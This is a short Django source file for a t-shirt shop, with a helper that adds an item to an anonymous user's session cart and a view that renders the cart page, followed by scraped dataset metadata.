def add_cart_to_anom_user(cart, size, tshirt):
    """Merge one unit of tshirt/size into the session cart list (in place).

    Each entry is a dict {'tshirt': <id>, 'size': <str>, 'quantity': <int>}.
    An existing matching entry has its quantity bumped; otherwise a new
    entry with quantity 1 is appended.
    """
    matched = False
    for entry in cart:
        same_shirt = entry.get('tshirt') == tshirt.id
        same_size = entry.get('size') == size
        if same_shirt and same_size:
            entry['quantity'] = entry['quantity'] + 1
            matched = True
    if not matched:
        cart.append({
            'tshirt': tshirt.id,
            'size': size,
            'quantity': 1,
        })
def cart(request):
    """Render the cart page, resolving the ids stored in the session into
    Tshirt/SizeVariant model instances for the template."""
    cart = request.session.get('cart')
    if cart is None:
        cart = []
    for entry in cart:
        shirt_id = entry.get('tshirt')
        shirt = Tshirt.objects.get(id=shirt_id)
        entry['tshirt'] = shirt  # replace the stored id with the model instance
        entry['size'] = SizeVariant.objects.get(tshirt=shirt_id, size=entry['size'])
    print(cart)  # leftover debug output, kept to preserve behavior
    return render(request, template_name='store/cart.html', context={'cart': cart})
| [
"kumarkp547@gmail.com"
] | kumarkp547@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.